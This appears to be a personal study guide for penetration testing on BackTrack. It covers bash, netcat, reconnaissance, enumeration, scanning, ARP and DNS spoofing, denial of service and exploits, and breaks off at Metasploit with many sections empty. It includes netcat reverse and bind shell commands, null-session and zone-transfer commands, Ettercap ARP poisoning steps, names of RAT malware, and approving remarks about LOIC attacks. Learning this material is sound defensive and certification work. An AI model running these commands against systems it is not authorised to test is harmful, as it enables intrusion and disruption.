OSCP Hacking techniques, Kali Linux, commands, etc...
Views
Google
This kind of attack might not always be successful and can be easily configured to be detected/
Introduction_____
___________________________________________ 7
BackTrack Basics____________________________________________ 7
XWindow________________________________________________ 8
Set IP Through DHCP______________________________________ 8
Set Static IP______________________________________________ 8
Start SSH Service__________________________________________ 8
Start Apache Service________________________________________ 8
Start TFTP Service_________________________________________ 8
Starting VNC Service_______________________________________ 8
Checking Open Ports_______________________________________ 8
Bash Basics________________________________________________ 9
Commands_______________________________________________ 9
Special Characters__________________________________________ 9
Asterisk________________________________________________ 9
Question Mark__________________________________________ 10
Arrows________________________________________________ 10
Double Arrows__________________________________________ 10
Pipe___________________________________________________ 11
Grep____________________________________________________ 11
Cut_____________________________________________________ 11
Sort____________________________________________________ 11
Scripting_________________________________________________ 11
Netcat____________________________________________________ 11
Netcat Client Connection____________________________________ 11
Netcat Server Connection____________________________________ 12
Bind Shells_______________________________________________ 12
Reverse Shells____________________________________________ 12
Netcat vs. nc.traditional______________________________________ 12
Wireshark_________________________________________________ 12
Using___________________________________________________ 13
The TCP “3-Way Handshake” (Getting a Website)__________________ 13
Filters___________________________________________________ 13
Password Grabbing________________________________________ 13
Reconnaissance_____________________________________________ 13
Google__________________________________________________ 14
Google Symbols___________________________________________ 14
Quotes_________________________________________________ 14
Asterisk________________________________________________ 14
Minus_________________________________________________ 15
Google Operators__________________________________________ 15
intitle__________________________________________________ 15
inurl__________________________________________________ 15
site___________________________________________________ 15
cache__________________________________________________ 15
“Evil” Google Searches_____________________________________ 15
Google Dorks_____________________________________________ 16
Service Enumeration_________________________________________ 16
Whois Enumeration________________________________________ 16
DNS Server Enumeration____________________________________ 16
Host Lookup_____________________________________________ 16
Reverse Host Lookup_______________________________________ 16
DNS Zone Transfers________________________________________ 17
SNMP Enumeration________________________________________ 17
SMTP Enumeration________________________________________ 17
OS Fingerprinting_________________________________________ 17
NetBIOS Enumeration______________________________________ 17
Active Directory Enumeration________________________________ 18
SMB Enumeration_________________________________________ 18
Windows Null Sessions____________________________________ 18
enum4linux_____________________________________________ 18
smb-enum-users_________________________________________ 18
smb-enum-shares_________________________________________ 18
Maltego___________________________________________________ 18
Port Scanning______________________________________________ 19
Theory__________________________________________________ 19
Types___________________________________________________ 19
Problems________________________________________________ 20
Ping Assumptions________________________________________ 20
UDP Scans Problems______________________________________ 20
nmap___________________________________________________ 20
NSE__________________________________________________ 20
zenmap__________________________________________________ 21
Unicorn Scan_____________________________________________ 21
autoscan_________________________________________________ 21
ARP Spoofing______________________________________________ 21
Theory__________________________________________________ 21
Limitations_______________________________________________ 22
Ettercap_________________________________________________ 22
DNS Spoofing____________________________________________ 22
SSLStrip________________________________________________ 23
OS Vulnerabilities___________________________________________ 23
Vulnerability Assessment____________________________________ 23
Web Server Vulnerabilities___________________________________ 23
Database Vulnerabilities_____________________________________ 24
TCP Stack Vulnerabilities____________________________________ 24
Application Vulnerabilities___________________________________ 25
Denial of Service____________________________________________ 25
Theory__________________________________________________ 25
Flood Attacks_____________________________________________ 25
Syn Flood______________________________________________ 25
Mitigation for SYN Floods_________________________________ 25
UDP Flood_____________________________________________ 25
Mitigation for UDP Floods_________________________________ 26
ICMP Flood____________________________________________ 26
Mitigation for ICMP Floods________________________________ 26
Smurf Attack____________________________________________ 26
Mitigation for Smurf Attacks________________________________ 26
Ping Of Death____________________________________________ 26
Teardrop_________________________________________________ 26
LOIC___________________________________________________ 26
SSL DoS________________________________________________ 27
Exploits___________________________________________________ 27
Compiling_______________________________________________ 27
Resources________________________________________________ 27
Remote Administration Tools___________________________________ 27
Theory__________________________________________________ 27
Uses____________________________________________________ 27
Darkcomet_______________________________________________ 28
CyberGate_______________________________________________ 28
Solitude_________________________________________________ 28
Cerberus_________________________________________________ 28
Blackshades______________________________________________ 28
Metasploit_________________________________________________ 28
msfconsole_______________________________________________ 28
msfcli___________________________________________________ 28
msfweb__________________________________________________ 28
msfgui__________________________________________________ 28
Updating Metasploit________________________________________ 28
Exploitation______________________________________________ 29
Payloads_________________________________________________ 29
Meterpreter_______________________________________________ 29
Encoders________________________________________________ 29
Auxiliary________________________________________________ 29
Credential Collection_______________________________________ 29
db_autopwn______________________________________________ 29
Browser Autopwn_________________________________________ 29
Anti-virus Bypass___________________________________________ 29
Theory__________________________________________________ 29
Droppers________________________________________________ 29
Theory________________________________________________ 29
Crypters_________________________________________________ 30
Theory________________________________________________ 30
The Encrypter___________________________________________ 30
The Stub_______________________________________________ 30
Antis__________________________________________________ 30
Junk Code_______________________________________________ 30
Buffer Overflows____________________________________________ 31
Theory__________________________________________________ 31
Protections_______________________________________________ 31
Common Attacks__________________________________________ 32
Problems________________________________________________ 32
Fuzzers__________________________________________________ 32
Web Based Attacks___________________________________________ 33
Zero Frames and Zero Images_________________________________ 33
Command Execution_______________________________________ 33
Cross Site Request Forgery___________________________________ 33
File Inclusion_____________________________________________ 33
Local__________________________________________________ 34
Remote________________________________________________ 34
SQL Injections____________________________________________ 34
URL__________________________________________________ 34
Authentication Bypass_____________________________________ 36
Blind__________________________________________________ 36
SQLmap_______________________________________________ 36
Cross Site Scripting (XSS)___________________________________ 36
Non-Persistent___________________________________________ 37
Persistent_______________________________________________ 37
Web Based Exploitation Frameworks_____________________________ 37
OWASP Mantra___________________________________________ 37
Port Tunneling______________________________________________ 37
Theory__________________________________________________ 38
HTTP CONNECT Tunneling_________________________________ 38
SSL Tunneling____________________________________________ 38
stunnel________________________________________________ 38
SOCKS_________________________________________________ 38
SSH Tunneling____________________________________________ 39
Local__________________________________________________ 39
Remote________________________________________________ 39
Dynamic_______________________________________________ 39
Tor_______________________________________________________ 39
Theory__________________________________________________ 39
Installing________________________________________________ 39
Using___________________________________________________ 39
Authentication Vulnerabilities__________________________________ 40
Theory__________________________________________________ 40
Problems With Networks____________________________________ 40
Plain Text________________________________________________ 40
Hashing Systems__________________________________________ 40
MD4__________________________________________________ 40
DES__________________________________________________ 40
MD5__________________________________________________ 40
SHA1_________________________________________________ 40
NTLM________________________________________________ 40
MYSQL_______________________________________________ 41
Challenge Systems_________________________________________ 41
Uneven Algorithms________________________________________ 41
Here Be Dragons__________________________________________ 41
Password Attacks____________________________________________ 42
Theory__________________________________________________ 42
Strong Vs. Weak Passwords__________________________________ 42
Brute Force_______________________________________________ 43
Dictionary_______________________________________________ 43
Rainbow Tables___________________________________________ 43
GPU Cracking____________________________________________ 43
Misconceptions____________________________________________ 44
hydra___________________________________________________ 45
xhydra__________________________________________________ 45
medusa__________________________________________________ 45
ncrack___________________________________________________ 45
Wireless Attacks_____________________________________________ 45
Theory__________________________________________________ 45
WEP___________________________________________________ 45
WEP Cracking____________________________________________ 46
Cafe Latte______________________________________________ 46
ARP Replay____________________________________________ 46
Korek's Chop Chop Attack_________________________________ 46
Hirte Attack_____________________________________________ 46
Fragmentation Attack_____________________________________ 46
WPA___________________________________________________ 46
WPA Cracking____________________________________________ 46
WPA2__________________________________________________ 47
WPA2 Cracking___________________________________________ 47
WPS____________________________________________________ 47
WPS Cracking____________________________________________ 47
Wash__________________________________________________ 47
Reaver_________________________________________________ 47
DoS Attacks______________________________________________ 47
Deauthentication Attacks___________________________________ 47
Man In The Middle_________________________________________ 47
Social Engineering___________________________________________ 48
Introduction
This resource is a collection of notes that I took over the past year relating to the subject of computer security. This note collection will not teach you by itself. It is meant to be more of a refresher, guide, and quick resource to help people learn.
To use this please install BackTrack. Most of the tools are already installed and will make your life a whole lot easier.
I would also suggest brushing up on your Linux skills as they will be used heavily in this.
If you like this document, please help support the author and donate to him. The author needs to eat too. If you have any questions, my contacts are as follows.
Email – napalmfire.df@gmail.com
Skype – napalmfiredf
BackTrack Basics
BackTrack normally starts in command line mode.
The default log-in is
• User: root
• Pass: toor
XWindow
To begin using BackTrack we must start the GUI.
• startx
This will start KDE or GNOME depending on the version, however not all tools are GUI based, use Konsole for all tools. The /pentest/ directory has all the tools you will need.
Set IP Through DHCP
• dhcpcd [interface]
However in BT4 you must first install dhcpcd on new installations using apt-get install dhcpcd.
Set Static IP
• ifconfig [interface] [ip]/24
• route add default gw [gateway]
• echo nameserver [gateway] > /etc/resolv.conf
Start SSH Service
Go to Start → Services → SSH → Setup SSH
This will generate SSH keys and start service.
SSH port is 22.
• service ssh start
Start Apache Service
Go to Start → Services → HTTPD → Start HTTPD
HTTPD port is 80
• service httpd start
Start TFTP Service
• tftpd –daemon –port 69 /tmp/
or Start → Services → TFTP → Start TFTP - TFTP port is 69
Starting VNC Service
• vncserver
or Start → Services → VNC → Start VNC
VNC port is 5901 (Add +1 to port for every new connection)
Checking Open Ports
• netstat -ant | grep [port]
Netstat searches for open ports on host and grep filters results.
Bash Basics
BASH or the Bourne Again Shell is the terminal on which most Linux computers operate. This lets us pass commands directly to the OS, allowing us greater control and access.
Commands
The basic structure of a command:
• command argument argument argument
Here the command command is run, using argument as it's argument. A command is the program being run, an argument is the data that the user wishes to pass to that program. Not all programs need to receive data, some do one shot functions.
An example of a useful command:
• cat emails.txt
This runs the program “cat” and tells it to open emails.txt.
Another thing to be wary of is switches. Switches usually have a “-” or “--” in front. These are used to tell the program to operate a certain way, or to denote a specific field of input.
Consider:
• nmap -sV -sS 192.168.0.1
This line runs the program “nmap” and tells it to use the -sV and -sS functions in nmap on the IP 192.168.0.1.
Another example:
• cut -d” “ -f3 emails.txt
This would invoke the program”cut” and tell the program to use the -d with “ “ as an argument. It also tells it to use -f and send “3” as an argument to -f.
Special Characters
Certain characters has special meanings in BASH and are very useful to us when dealing with large amounts of data.
Asterisk
Asterisks are a character that replaces itself with all possible entries for a file. For instance, consider this directory listing.
• email-jodie.txt
• email-sam.txt
• email-unwanted.pdf
• junk.txt
• morejunk.txt
Lets say we want to cat all the text files with email in the name. We could go through and cat them one by one but, that would take too long. So instead we use the asterisk to fill in all possibilities.
• cat email*
While this would cat the files we did want, it will also cat email-unwanted.pdf because it was in our range of text. Let's try again, this time limiting it only to text files.
• cat email*.txt
This would cat only the files we want, ensuring no extra worthless data gets into our search.
Alternatively an even easier way to do this would to use:
• cat e*.txt
This would do the same exact thing, in much less characters.
Question Mark
Similar to the asterisk, however, limited to one character.
Consider this directory listing:
cats1.txt
cats2.txt
cats3.txt
cats1-backup.txt
cats2-backup.txt
cats3-backup.txt
Our goal is to cat all the files that aren't backups. If we were to use the star in this situation, it would return all the results, so we can use a question mark to search for files with only one letter from what we need.
• cat cats?.txt
Arrows
Arrows, sometimes refereed to as tacs. are used to write and read to a file from a command. For example, lets say that you wish to save the output of a program into a file. You can use the arrow to write that output directly to it, making your life easier.
• nmap 192.168.0.1 > file.txt
Here we take the output of nmap and stuff it into file.txt, allowing us to save the results of our scan. When doing this, if the file previously existed, it erases all the data in the file before adding the new data.
We can also read input from files.
• cut -d” “ -f3 < ip.txt
This would send the contents of ip.txt into the cut program.
Double Arrows
Double arrows, sometimes referred to as tac-tacs, are used to add data to an already existing file.
For example, lets say you wanted to add the result of a new nmap scan to a file you already created.
• nmap 192.168.0.1 > >file.txt
This would append to the file.
Pipe
The pipe is an extremely useful character and, is very useful for text manipulation, among other things. Pipe takes the output of one program and uses it as input for another.
For example:
• nmap 192.168.0.1 | grep “smb”
This would run nmap and then, send the output to grep to use how it pleases. This can be useful for handling huge lines of text (which we will see later when talking about cut and sort)
Grep
Grep is a program that will search text for a specific pattern, and then output only the lines which contain the pattern.
For instance, lets say we have a large configuration file and, we have an option that we need to find the value of. Using grep, we can search the configuration file for that text, and have it display the result.
• cat long.conf | grep “hard-to-find-value”
Cut
Cut is a program that is used to split text based on a delimiter. This allows us to quickly get text that might be several characters deep.
For example, examine this set of text.
id:user:password:email
1:admin:secret:admin@admin.com
Say we only want all the usernames, we could use : as a delimiter, and specify what field we want to get, which, in this example, would be two.
• cut -d':' -f2
This will output:
user
admin
Sort
Sort allows us to sort text but, is also has a nifty feature that allows us to remove duplicates.
Scripting
Netcat
Netcat – A tool used to write data directly to a TCP/UDP port. Can be in client mode or server mode.
Netcat Client Connection
This mode sets Netcat to client mode. This connects to a server through a port defined as an argument. This allows the client to receive and transmit data to the server.
• nc -v [ip] [port]
Netcat Server Connection
This mode sets Netcat to server mode. This allows clients to connect to that port and receive and transmit raw data.
• nc -lvvp [port]
Sending a File
• nc -vv [ip] [port] < [file]
Receiving a File
• nc -lvvp [port] > [file]
Bind Shells
Netcat has the ability to redirect the input and output of a console to a TCP/UDP port. This can allow remote administration. This is called a bind shell. This then allows a server to broadcast its shell to others.
Server
• nc -lvvp [port] -e [shell]
As a note Linux's shell is located at /bin/bash/ while Windows's shell is cmd.exe.
Client
• nc -v [ip] [port]
Now the shell is transmitted to the client when he connects to the server.
Reverse Shells
This works the reverse of a bind shell. This allows the client to transmit their shell to a server. This has the same effect as the bind shell.
Server
• nc -lvvp [port]
Client
• nc -v [ip] [port] -e [shell]
Netcat vs. nc.traditional
In some linux enviroments, nc might already be installed. However, this version is different from the actual version. To get the real version of netcat, use
• apt-get install nc.traditional
you will also have to replace nc with nc.traditional in the before commands.
Wireshark
Wireshark is a packet sniffer which can capture packets and display the contents of them.
Using
• wireshark &
This will put wireshark in the background of the console.
Once loaded, it is simple to use. Just select the interface you'd like to listen in on. Once in listening mode, Wireshark will capture all incoming packets on that interface.
The TCP “3-Way Handshake” (Getting a Website)
Wireshark displays packets captured by the most recent packet last. The list expands downward. Here, we can see a sample capture of the process of making a connection and getting a webpage through HTTP.
#
|
Source
|
Destination
|
Protocol
|
Info
|
Description
|
1
|
You
|
Gateway
|
DNS
|
Standard query of host
|
You ask the gateway where the host is.
|
2
|
Gateway
|
You
|
DNS
|
Standard query response [ip]
|
Gateway tells you IP Address.
|
3
|
You
|
Host
|
TCP
|
SYN
|
1st part of 3 handshake.
|
4
|
Host
|
You
|
TCP
|
SYN, ACK
|
2nd part of 3 handshake.
|
5
|
You
|
Host
|
TCP
|
ACK
|
3rd part of 3 handshake.
|
6
|
You
|
Host
|
HTTP
|
GET/HTTP
|
Beginning of sending webpage
|
Filters
Filters let you exclude packets based on search patterns. For instance, lets say you'd like to only see traffic on port 1234. Filters will let you exclude anything that isn't on those ports.
• tcp.port==1234
Filters also support Boolean logic. For instance, lets say you'd like to see port traffic on both 1234 and 4321.
• tcp.port==1234 && tcp.port==4321
This will display both ports' traffic.
Password Grabbing
Reconnaissance
More info = Higher chance of success
Passive Reconnaissance – Stealthily gathering information in a non-intrusive way. There is little to no chance to being caught.
Active Reconnaissance – Gathering information in a way that is intrusive and may be detected by an IDS. There may be a medium to high risk of detection.
Look for:
• Names
• Numbers
• Emails
• Addresses
• Affiliates
• Links
• IP addresses
• Nameservers
• Site Maps
Google crawls a huge host of web sites, often times crawling through poorly configured webservers. Using specific search terms we will be able to find things about webservers or, be able to increase our attack surface, through the information we gather here.
Some examples would be:
• Possible SQL injections
• Possible XSS attacks
• Webmail logins
• SQL Dumps
• Administration pages
• Web backdoors
• Misconfigured web applications
Google Symbols
Google symbols let us refine our search options, letting us quickly and efficiently get the data we need.
Quotes
• “search terms”
Putting a term in quotes only displays pages with that sequence of text. This is opposed to no quotes which will display all pages containing part or all of the text, regardless of sequence.
Asterisk
• * birds
The asterisk will fill in all possible terms for a sequence. For instance, the asterisk here will fill in all the different types of birds and much more, in an attempt to find your term.
Minus
• blue foot boobies -porn
The minus excludes pages with a specified terms. For example, this search excludes any pages with the term porn in it, since Google will display all pages containing boobies.
Google Operators
Google has many operators that can help us narrow our search results. Many of them will scour pages looking for the exact information we need, others can restrict data to certain types.
intitle
The intitle operator restricts search results to only pages that contain a pattern in the title. For example:
• intitle:”National Geographic” Africa
The above will display result from pages that have National Geographic in then title and also have Africa on the page. This is useful for finding admin pages, as well as file indexs.
inurl
The inurl operator lets us restrct to search terms that are in the URL of the result. Using this we can often find potentially vulnerable pages or specific admin login pages.
• inurl:admin.php login
site
The site operator lets us restrict results to that of a specific domain. This allows us to narrow our search tom a specific target.
• site:vulnerable.com inurl:admin.php login
cache
The cache operator lets us see the last version of a webpage crawled by Google. By using this we can often find results of a webpage that were deleted some time ago.
• cache:google.com
“Evil” Google Searches
I will only cover a few here, since the topic has almost endless searches. The idea of “evil” Google searches is to find pages that are vulnerable, have default passwords, or find caches of information.
These searches allow an attacker to search specific websites for vulnerabilities.
For example:
Let's look for default XAMPP installs.
Google Dorks
Service Enumeration
Service Enumeration is the technique of looking for open information about a targets ISP, nameservers, IP addresses, and running protocols.
Whois Enumeration
• whois [url/ip]
Gives:
• Web server admin
• Numbers
• Emails
• Nameservers
DNS Server Enumeration
• nslookup
Begins DNS Lookup
• >[website]
Gives DNS info on specified domain
• >set type=mx
Gives Mail Exchange servers
• >set type=ms
Gives mail server IPs.
Host Lookup
Use this to get an IP address for a domain.
• host [url]
You can also use the -t switch to specify type of server.
Look up nameservers for a specified host.
• host -t ns [url]
Look up mail exchange for a specified host.
• host -t mx [url]
Reverse Host Lookup
This lets you take an IP and reverse it into a domain. Using this we can often find out about the domains IP addresses are attached to.
• host [ip]
DNS Zone Transfers
DNS zone transfers are a problem existing is misconfigured DNS servers which, allow nameserver communication. With this, an attacker can get the entirety of an external network handed to them by just asking for a copy of the zone record.
We can perform these attacks using host. We first need a list of nameservers which, can be provided by using nslookup.
• host -l [victim url] [our url]
This will attempt a zone transfer to our own URL. If successful, it will give us all the IP – URL match-ups for us to use, exposing hidden subdomains to us.
This kind of attack might not always be successful and can be easily configured to be detected/
SNMP Enumeration
Simple Network Management Protocol is a UDP based protocol that monitors network attached devices. Its authentication method is using public and private keys. Public keys may not have all permissions, however, only read access is needed to enumerate. The public key is usually “public”.
• Weak authentication system.
• Vulnerable to IP-spoofing.
To begin using SNMP use the following command.
• snmpwalk -c [key] -v1 [ip] 1
SMTP Enumeration
Simple Mail Transfer Protocol handles outgoing email.
Checks if user is valid.
• vrfy [user]
OS Fingerprinting
OS Fingerprinting – Is the process of scanning open ports and banner grabbing to detect the OS.
Once used you can figure out what exploits to use. Nmap provides free OS detection.
• nmap -O [ip]
NetBIOS Enumeration
NetBIOS – Network Basic Input Output System is a forgotten technology that runs by default on most Windows computers. It provided early name resolution. This task is now more commonly handled by DNS but, NetBIOS still runs as a default service on most Windows computers.
NBTScan – Free NetBIOS scanner.
Active Directory Enumeration
Active Directory - Contains records of users, servers, sites, and workgroups.
Every account on the system has read permissions. It uses LDAP. Ldp.exe is commonly used to control AD. You can possibly authenticate with a Guest or null account.
It would only take one compromise to get all the AD info.
SMB Enumeration
SMB enumeration is extremely useful as Windows runs it as a default service. We can use this to find a list of users (Making password cracking easier), mount remote shares and, even run executables through it.
Windows Null Sessions
A windows null session is the ability to login to a Windows computer through SMB and view info about the computer. You do this by supplying a null user or password. Then you can mount shares from the computer.
To use it you must use the command line in Windows.
• net use \\share\ipc$ “” /USER: “”
If the command is successful the attacker can use the net view command to view information about the computer such as users, processes , services, and uptime.
You may also be able to gain C: drive access by going to Run → \\share\c$
enum4linux
enum4linux is a tool based off of a Windows tools called enum.exe. It carries many of the same features and is extremely comprehensive in it's data.
smb-enum-users
This script lets us enumerate the users on a remote Windows computer. This script is very similar to enum.exe for Windows.
• nmap -sS -sU --script smb-enum-users.nse -p U:127 T:139,445 [host]
WARNING! This script has two options lsaonly and samronly. samronly REQUIRES a real user account, not just guest. lsaonly requires only a guest account.
smb-enum-shares
This script lets us enumerate the shares of a remote windows computer.
Maltego
Port Scanning
Theory
Port Scanning - The technique of scanning for open ports to ascertain information about a target computer. It is the first action to take before attempting exploit. It is part of the information gathering phase. Can be intrusive and detected by an IDS
Packets – Information sent over the network in smaller chunks. Uses flags to indicate the type of packet. Flags can be mixed.
Types
Type
|
Meaning
|
Syn
|
Initial Packet(Begin handshake)
|
Ack
|
Acknowledgment(Reply for packet received)
|
Fin
|
Finish(Done with connection)
|
Urg
|
Urgent
|
Psh
|
Push
|
Rst
|
Reset(Sent to reset the TCP handshake)
|
TCP - Port that uses a 3-way handshake to identify open ports and begin data transfers.
UDP - A port that uses a stateless system. If the port is open there is no reply. If it is closed you get an ICMP ping.
Full Scan - Completes 3-way handshake. Is intrusive and easily detected but, reliable.
Half Scan/SYN Scan – Sends only syn packets and does not complete the handshake. This makes it harder to detect.
UDP Scan – Scans UDP ports. However it is unreliable because UDP is stateless. If the port is up there is no reply. If it is down source receives an ICMP unreachable.
Stealth Scan – Uses same method as syn scan but varies the frequency and timing and randomizes the ports scanned making it harder to detect.
Xmas Scan – Creates a malformed packet with PSH, FIN, and URG flags to scan a system. Doesn't work against Windows.
Ack Scan – Scanner sends ACK packets and receives a RST packet back. This shows the attacker which ports are open.
ICMP Scan – Very detectable ping scan. Rarely used because it is unreliable, inefficient ,and detectable.
Problems
Port scans often times are noisy and dangerous, doing one can make you an easy target for an IDS or firewall logging system.
Ping Assumptions
In most cases, unless told not to, scanners will attempt to ping the host before attempting a port scan. If it doesn't get a ping back the host is considered as “not alive”. This I a false assumption in some cases and can provide faulty scan results, telling you that computers are not alive that actually are and are just not responding to ping probes.
UDP Scans Problems
Since UDP scans are stateless, there can be issues with the detection process. For example, a firewall can be blocking probes to certain ports and, you'll never know.
It could also allow the data through but, not kill the ICMP Unreachable packet on its way out.
As a result, take UDP scans with a grain of salt, chances are, you aren't seeing the full picture.
nmap
Nmap runs a port scan on the specified IP.
• nmap -p [port] [ip]
Full port scan.
• nmap -p 1-65535 [ip]
OS detection
• nmap -O [ip]
Service versions scan
• nmap -sV [ip]
Comprehensive scan
• nmap -A [ip]
NSE
The nmap Scripting Engine is a tool which allows us to write and use scripts to aid us in our penetration testing goals. We used a script ealier in the SMB Enumeration section to attempt an enumeration of users on a system.
We can see the various .nse scripts included with nmap on their site, and we can also see them by going through the nmap scripts directory.
We can also attempt to use all scripts using this command:
• nmap --scripts all [ip]
zenmap
Zenmap is a nmap gui that will allow use to easily understand the sometimes overflow of data that nmap can provide.
Unicorn Scan
A scanning tool like nmap but, has a web GUI. (See Appendix for list of features)
• unicornscan [ip]
autoscan
ARP Spoofing
Theory
ARP - A protocol for finding a MAC address for a host whose IP is known. It consists of a Broadcast request phase, and a reply phase, and a conformation phase.
ARP cache - The table containing MAC-IP match ups.
ARP Spoofing(APR) - The technique used to poison ARP caches. A sniffer get ARP packets from a switch and proceeds to intercept them. Then it can route all network traffic to the attacker.
1. Host-A broadcasts on all ports . ARP Request
2. Host-B receives request and sends back reply. ARP Reply
3. Host-A sends conformation to Host-B
By listening in a sniffer could get all the MAC-IP match-ups on the network. by using this data we can reroute packets through our machine and then out to the destination.
It does this by actively listening then modifying standard ARP packets.
Victim Packet
| ||
MAC
|
IP
| |
Source
|
Attacker
|
Gateway
|
Destination
|
Victim
|
Victim
|
Gateway Packet
| ||
Source
|
Attacker
|
Victim
|
Destination
|
Gateway
|
Gateway
|
Limitations
Once in the attack stage, the attacker must reroute all traffic to the appropriate destinations while still poisoning the ARP cache. There are 5 rules about APR attacks.
1. APR only works on LANs.
2. Attacker must reroute packets unless a DoS attack is preferred.
3. Attacker must know where to reroute packets.
4. APR will slow down the network as you are adding another layer to the network.
5. APR must update constantly. If not, the computer will delete the entries if it ARP requests an address again.
6. An APR attack can not be done to computers connected to the main router themselves. This is because the router is able to intercept them before damage is done.
Also, APR attacks need to have some thought put into them.
1. One peer may be the Internet. If this is true you need to have the routing tables or be broadcasting.
2. There could be multiple entrance/exits on a LAN
3. There may be anti-APR protections.
Ettercap
Ettercap - A tool used for ARP spoofing.
Get hosts on a network
• Hosts -> Scan for hosts
• See list of Hosts
• Hosts -> Hosts lists
• Target 1 = Gateway
• Target 2 = Victim
• MITM->ARP Poisoning to begin APR.
DNS Spoofing
DNS Spoofing – The tactic of making a malicious zone transfer to make a false IP-URL match-up. This is done to send a target to a malicious website or DoS. EX: Google.com = attackers IP
1. Run ettercap with a unified sniffer
2. Turn on DNS spoof plugin
3. APR
4. Start sniffer
SSLStrip
SSLStrip is a python script which, when run in conjunction with an ARP attack, abuses a technique used by many website hosts where, when someone types in a URL it uses a 302 redirect or uses an SSL element embeded on the page to move the user to HTTPS. SSLStrip will strip the HTTP out of 302 requests and pages served through HTTP.
OS Vulnerabilities
All OS have all vulnerabilities. It is a common misconception that Windows is the only OS with holes.
Exploit – A malicious piece of code which can compromise a systems security and give an attacker access to that computer. They are used to penetrate and ultimately gain access to a system. They have a broad range of payloads and can do just about anything.
Common vulnerabilities
• Application Vulnerabilities
• TCP Stack Overflows
• Default permissions
• Default security settings
The most popular, successful, and common attacks are in default services, software, or processes that run on the computer. This is because the software is preinstalled and usually running by default. However, there are holes in all software and they can be taken advantage of.
Vulnerability Assessment
Vulnerabilities are security flaws in software. The are caused by poorly written code and a lack of testing. Patches fix holes. Unpatched systems are more vulnerable so you should always update all software.
Vulnerability scanners
• Nessus
• Nikito
Security Websites
• Bugtraq
• CVE Sites
• Milw0rm
• exploit-db
Web Server Vulnerabilities
Web servers are extremely vulnerable because of many reasons.
• Permanent connection to Internet
• Most likely firewalled
• Easier to exploit due to poor security.
Common vulnerabilities
• Passwords stored in plain-text or code
• Ability to traverse directories without getting 503.
• Ability to execute scripts
• Ability to bypass URL Checking and return a command prompt
• Improperly patched and configured servers.
Database Vulnerabilities
All DB systems have holes. Database servers may be local or remote. Might be behind a fire wall or DMZ.
Common vulnerabilities
• Misconfigured permissions
• bad database objects
• SQL injection
• Default DB passwords
• Null accounts/null sa account
• Vulnerable to the application they serve
• If application is poorly written it can allow for a compromise
TCP Stack Vulnerabilities
All OSs have this vulnerability. It is usually exploited for DoS attacks. It can be used to get in deeper into a network.
Common Vulnerabilities
• TCP Sequence Prediction (Session jacking)
• TCP Window Size Overflow
• Syn Flood
• APR
• DNS Poisoning (DNS Zone Transfers)
• High Volume Attacks (Ping of Death, Smurf, Teardrop, Botnets)
Smurf – Pinging a system with a broadcast address to get the target to send DoS other computers.
Teardrop – Sending malformed packets with bad IP fragments which causes an overflow on the TCP stack and cause a DoS.
Application Vulnerabilities
These vulnerabilities affect almost all software. They usually stem from poor coding practices.
Common Vulnerabilities
• Buffer Overflows
• Weak Authentication
• Poor Data Validation
• Written with errors/poor error checking
Denial of Service
Theory
The idea is to force a victim to use so much RAM that the computer slows to a halt, crashes, and goes offline. DoS attacks have become very mainstream as they often require little technical knowledge and tools are widely available.
Flood Attacks
Flood attacks are a form of DoS attack that attempts to bring a system down by flooding it with connections. This works because for every connection one makes, the computer must open up a slot in RAM for the connection. As a result, the computer can become bogged down until it crashes or, stops serving new connections.
Syn Flood
This abuses an issue in the TCP 3-way handshake, that can be exploited by an attacker to down a service. This happens when an attacker(s) sends many SYN requests to a server but, never replies to them. The server will wait until a time-out on the connection is reached, keeping a slot of RAM occupied for a specified amount of time. The attacker(s) must open enough slots in memory before their requests start timing out or, the attack will fail.
Mitigation for SYN Floods
The best way to deal with SYN floods is SYN cookies. SYN cookies work by sending the appropriate SYN/ACK response but, discards the SYN packet it received, ensuring SYN floods fail. This is because SYN floods rely on servers keeping the SYN packet for a specified period of time, so they can fill up the queue.
Firewalls can also easily detect flood attacks as, most have built in rules about the maximum connections one address is allowed to have.
UDP Flood
This abuses a flaw in UDP statless connections where, when no service is listening on a port, it replies with a ICMP unreachable. As a result, an attacker must only send large a large number of UDP packets to different ports that are closed. As a result, the server will respond with a large number of ICMP packets, causing the system to eventually become offline.
Mitigation for UDP Floods
Firewalls should be installed to filter out non-open ports, causing the UDP flood to fail as the UDP packets never reach the intended host.
ICMP Flood
This attack involves sending massive amounts of ping packets to a host, forcing a reply. The idea is similar to the previous flood attacks as, the system must open a slot of RAM to deal with the ping.
Mitigation for ICMP Floods
ICMP floods are easily stopped by firewalls. Most firewalls have automatic ICMP flood detection systems built in.
Smurf Attack
Smurf attacks involve spoofing source IP address to get a system to flood another system. The system who receives the spoofed packet believes the supplied source address is the one that sent it. As a result, this causes the system to respond to the source address. If spammed with said spoofed packet the server will, in turn, spam the victim.
Mitigation for Smurf Attacks
Simple firewall rules should stop this kind of attack.
Ping Of Death
This attack involves sending malformed ping packets in an attempt to cause a crash on the victim. The crash can be either the TCP stack or the system itself.
These attacks don't work much any more. They only tend to work on much older systems.
Teardrop
This attack involves sending mangled IP fragments in an attempt to cause a crash on the system. These attacks don't work much either.
However, the last documented case was in 2009 and for Windows Vista and 7. It had to do with SMB not handling IP fragments properly.
LOIC
Low Orbit Ion Cannon or LOIC is a popular tool for flood attacks. This tool has the ability to send TCP, UDP and ICMP floods at a specified host.
LOIC has been used heavily by the group Anonymous, and has helped down many unsavory sites like RIAA and MPAA.
SSL DoS
This attack has been known about since 2003 and is a flaw regarding SSL's renegotiation feature. This allows an attacker to down a server completely from just one connection rather than many like in traditional flood attacks.
The hack was first made public by the THC Team.
Exploits
Exploit - A malicious piece of code meant to compromise a system.
Compiling
Some exploits need to be compiled before use. This is because one exploit might not fit every system. You usually must edit the code and then compile it.
For C and C++ you must use the gcc compiler.
• gcc -o <app> <file>
This will compile the code under the application name <app>.
For python, Perl, Ruby, and other scripting languages.
• chmod +x <file>
To find useful exploits cat and grep /pentest/exploits/exploitdb/files.csv
Warning! Some exploits may be unreliable.
Resources
Exploit code site
• milw0rm.com ← Down
• exploit-db.com
Remote Administration Tools
Theory
Remote Administration Tools or RATs allow an attacker to take complete control of a remote computer, often allowing them to spy and infect other users on a network. The goal of these tools is to make it easy for an attacker to administrate many bots, and also, formulate attacks against other targets using these bots.
Uses
Many free and commercial RATs are available for download. They often allow an attacker to keylog, steal passwords, perform flood attacks, and even remotely view the users screen and webcam. Attacker often route their internet connections through infected hosts when attacking servers to ensure anonymity.
Darkcomet
CyberGate
Solitude
Cerberus
Blackshades
Metasploit
Metasploit is a open source exploitation framework used to simply and easily write exploit code for applications. It is written in Ruby and extremely powerful. It has many great features which make it a great addition to any pen-testers library
msfconsole
